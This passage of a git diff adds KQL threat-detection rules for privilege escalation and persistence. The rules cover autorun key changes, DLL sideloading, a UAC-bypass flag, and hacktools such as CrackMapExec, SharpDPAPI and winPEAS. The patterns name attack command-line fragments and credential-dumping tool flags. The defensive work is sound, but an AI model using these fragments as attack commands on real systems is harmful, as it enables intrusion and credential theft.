(x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData endswith "\\Discord\\Update.exe --processStart Discord.exe" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData in~ ("C:\\Program Files\\Opera\\launcher.exe", "C:\\Program Files (x86)\\Opera\\launcher.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart" and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql new file mode 100644 index 00000000..0d736142 --- /dev/null +++ b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: CurrentVersion NT Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey endswith "\\Image File Execution Options*" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" and RegistryKey contains "\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost") or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) and (not((((RegistryValueData in~ ("explorer.exe", "C:\\Windows\\system32\\userinit.exe,")) and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avira\\Antivirus\\avguard.exe") and RegistryKey endswith "SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" and (RegistryKey endswith "\\userinit\\UseAsDefault" or RegistryKey endswith "\\shell\\UseAsDefault")) or (InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or ((RegistryKey endswith "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion*" or RegistryKey endswith "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion*") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql new file mode 100644 index 00000000..0cfdabf9 --- /dev/null +++ b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql @@ -0,0 +1,13 @@ +// Title: Default RDP Port Changed to Non Standard Port +// Author: frack113 +// Date: 2022-01-01 +// Level: high +// Description: Detects changes to the default RDP port. +Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. +Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql new file mode 100644 index 00000000..09dc828f --- /dev/null +++ b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql @@ -0,0 +1,10 @@ +// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE +// Author: Jonhnathan Ribeiro, oscd.community +// Date: 2020-10-16 +// Level: high +// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql new file mode 100644 index 00000000..946328a1 --- /dev/null +++ b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql @@ -0,0 +1,10 @@ +// Title: DHCP Callout DLL Installation +// Author: Dimitrios Slamaris +// Date: 2017-05-15 +// Level: high +// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql new file mode 100644 index 00000000..88473e7c --- /dev/null +++ b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql @@ -0,0 +1,14 @@ +// Title: Direct Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2019-10-25 +// Level: medium +// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. +// - Legitimate administrator sets up autorun keys for legitimate reasons. +// - Discord + +DeviceProcessEvents +| where ProcessCommandLine contains "add" and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql new file mode 100644 index 00000000..0e1002a7 --- /dev/null +++ b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql @@ -0,0 +1,10 @@ +// Title: DLL Execution Via Register-cimprovider.exe +// Author: Ivan Dyachkov, Yulia Fomina, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects using register-cimprovider.exe to execute arbitrary dll file. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql new file mode 100644 index 00000000..d26ddbe1 --- /dev/null +++ b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql @@ -0,0 +1,10 @@ +// Title: DLL Load via LSASS +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-16 +// Level: high +// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008 + +DeviceRegistryEvents +| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql new file mode 100644 index 00000000..a5b34511 --- /dev/null +++ b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql @@ -0,0 +1,12 @@ +// Title: DLL Sideloading by VMware Xfer Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql new file mode 100644 index 00000000..4b644c9b --- /dev/null +++ b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql @@ -0,0 +1,12 @@ +// Title: Dllhost.EXE Execution Anomaly +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-27 +// Level: high +// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql new file mode 100644 index 00000000..9e503e72 --- /dev/null +++ b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql @@ -0,0 +1,13 @@ +// Title: Explorer NOUACCHECK Flag +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-23 +// Level: high +// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 +// False Positives: +// - Domain Controller User Logon +// - Unknown how many legitimate software products use that method + +DeviceProcessEvents +| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql new file mode 100644 index 00000000..2740394f --- /dev/null +++ b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql @@ -0,0 +1,12 @@ +// Title: Fax Service DLL Search Order Hijack +// Author: NVISO +// Date: 2020-05-04 +// Level: high +// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql new file mode 100644 index 00000000..1f45d537 --- /dev/null +++ b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql @@ -0,0 +1,10 @@ +// Title: File Creation In Suspicious Directory By Msdt.EXE +// Author: Vadim Varganov, Florian Roth (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql new file mode 100644 index 00000000..e5cb3b0a --- /dev/null +++ b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql @@ -0,0 +1,10 @@ +// Title: Guest Account Enabled Via Sysadminctl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: low +// Description: Detects attempts to enable the guest account using the sysadminctl utility +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -guestAccount" and ProcessCommandLine contains " on") and FolderPath endswith "/sysadminctl" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql new file mode 100644 index 00000000..deb09d0a --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql @@ -0,0 +1,10 @@ +// Title: HackTool - CrackMapExec Execution Patterns +// Author: Thomas Patzke +// Date: 2020-05-22 +// Level: high +// Description: Detects various execution patterns of the CrackMapExec pentesting framework +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106 + +DeviceProcessEvents +| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc " \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql new file mode 100644 index 00000000..ebb9ab75 --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - DInjector PowerShell Cradle Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-07 +// Level: critical +// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql new file mode 100644 index 00000000..df8f7ea4 --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - HollowReaper Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-01 +// Level: high +// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing. +It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012 + +DeviceProcessEvents +| where FolderPath endswith "\\HollowReaper.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql new file mode 100644 index 00000000..492ddb5b --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Impersonate Execution +// Author: Sai Prashanth Pulisetti @pulisettis +// Date: 2022-12-21 +// Level: medium +// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "impersonate.exe" and (ProcessCommandLine contains " list " or ProcessCommandLine contains " exec " or ProcessCommandLine contains " adduser ")) or (MD5 startswith "9520714AB576B0ED01D1513691377D01" or SHA256 startswith "E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql new file mode 100644 index 00000000..d267a9ad --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SharpDPAPI Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-26 +// Level: high +// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. +SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents +| where (FolderPath endswith "\\SharpDPAPI.exe" or ProcessVersionInfoOriginalFileName =~ "SharpDPAPI.exe") or ((ProcessCommandLine contains " backupkey " or ProcessCommandLine contains " blob " or ProcessCommandLine contains " certificates " or ProcessCommandLine contains " credentials " or ProcessCommandLine contains " keepass " or ProcessCommandLine contains " masterkeys " or ProcessCommandLine contains " rdg " or ProcessCommandLine contains " vaults ") and ((ProcessCommandLine contains " /file:" or ProcessCommandLine contains " /machine" or ProcessCommandLine contains " /mkfile:" or ProcessCommandLine contains " /password:" or ProcessCommandLine contains " /pvk:" or ProcessCommandLine contains " /server:" or ProcessCommandLine contains " /target:" or ProcessCommandLine contains " /unprotect") or (ProcessCommandLine contains " {" and ProcessCommandLine contains "}:"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql new file mode 100644 index 00000000..b8e07a5b --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - SharPersist Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-15 +// Level: high +// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql new file mode 100644 index 00000000..f027e1ea --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - SharpImpersonation Execution +// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-27 +// Level: high +// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql new file mode 100644 index 00000000..76348962 --- /dev/null +++ b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - winPEAS Execution +// Author: Georg Lauenstein (sure[secure]) +// Date: 2022-09-19 +// Level: high +// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith 